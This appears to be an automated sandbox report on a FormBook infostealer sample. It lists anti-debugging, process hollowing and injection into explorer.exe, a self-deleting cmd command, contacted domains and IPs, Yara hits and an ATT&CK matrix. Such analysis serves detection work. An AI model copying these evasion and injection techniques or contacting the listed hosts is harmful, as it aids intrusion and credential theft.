          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B34015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B34015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B22073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B31074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A80050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A80050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A92990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AF41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A84120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A92AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A92ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A78A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A83A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A65210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A65210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A65210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A65210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B1B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B1B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B38A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AF4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A94BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A94BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A94BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B35BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A71B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A71B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B1D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A92397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A93B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A93B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B38B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B38CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AFC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AFC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04935210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04935210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0493AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0493AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04953A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04948A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04974A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04974A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A08A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049FEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\explorer.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Domain query: www.th0rgramm.com
          Source: C:\Windows\explorer.exe | Domain query: www.mywinnersworld.com
          Source: C:\Windows\explorer.exe | Domain query: www.hatikuturkila.com
          Source: C:\Windows\SysWOW64\explorer.exe | Network Connect: 91.236.136.12 80
          Source: C:\Windows\explorer.exe | Network Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exe | Domain query: www.rainbowsdepot.com
          Source: C:\Windows\explorer.exe | Domain query: www.tonton-koubou.com
          Source: C:\Windows\explorer.exe | Network Connect: 163.44.185.226 80
          Source: C:\Windows\explorer.exe | Domain query: www.gracieleesgiftsandmore.com
          Source: C:\Windows\explorer.exe | Network Connect: 103.97.19.74 80
          Source: C:\Windows\explorer.exe | Domain query: www.ezmodafinil.com
          Source: C:\Windows\SysWOW64\explorer.exe | Domain query: www.formula-kuhni.com
          Source: C:\Windows\explorer.exe | Domain query: www.phillhutt.com
          Source: C:\Windows\explorer.exe | Domain query: www.orgoneartist.com
          Source: C:\Windows\explorer.exe | Network Connect: 67.205.188.68 80
          Contains functionality to prevent local Windows debugging
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Code function: 0_2_740D1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Section loaded: unknown target: C:\Users\user\Desktop\AQJEKNHnWK.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Thread register set: target process: 3388
          Source: C:\Windows\SysWOW64\explorer.exe | Thread register set: target process: 3388
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Section unmapped: C:\Windows\SysWOW64\explorer.exe base address: 8C0000
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exe | Process created: C:\Users\user\Desktop\AQJEKNHnWK.exe 'C:\Users\user\Desktop\AQJEKNHnWK.exe'
          Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\AQJEKNHnWK.exe'
          Source: explorer.exe, 00000004.00000000.217135660.0000000001398000.00000004.00000020.sdmp | Binary or memory string: ProgmanamF
          Source: explorer.exe, 00000004.00000002.469303523.0000000001980000.00000002.00000001.sdmp, explorer.exe, 00000007.00000002.472566811.00000000031C0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
          Source: AQJEKNHnWK.exe, 00000001.00000002.256768707.00000000026C0000.00000040.00000001.sdmp, explorer.exe, 00000004.00000002.469303523.0000000001980000.00000002.00000001.sdmp, explorer.exe, 00000007.00000002.472566811.00000000031C0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000002.469303523.0000000001980000.00000002.00000001.sdmp, explorer.exe, 00000007.00000002.472566811.00000000031C0000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: AQJEKNHnWK.exe, 00000001.00000002.256768707.00000000026C0000.00000040.00000001.sdmp | Binary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
          Source: explorer.exe, 00000004.00000002.469303523.0000000001980000.00000002.00000001.sdmp, explorer.exe, 00000007.00000002.472566811.00000000031C0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 1.2.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.1.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.AQJEKNHnWK.exe.1eef0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.1.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.AQJEKNHnWK.exe.1eef0000.4.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 1.2.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.1.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.AQJEKNHnWK.exe.1eef0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.1.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.AQJEKNHnWK.exe.1eef0000.4.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Native API1 | Path Interception | Process Injection612 | Virtualization/Sandbox Evasion3 | OS Credential Dumping | Security Software Discovery241 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot1
          Default Accounts | Shared Modules1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection612 | LSASS Memory | Virtualization/Sandbox Evasion3 | Remote Desktop Protocol | Clipboard Data1 | Exfiltration Over Bluetooth | Ingress Tool Transfer1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information1 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information3 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol12 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing11 | LSA Secrets | File and Directory Discovery2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery12 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

          Behavior Graph


          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
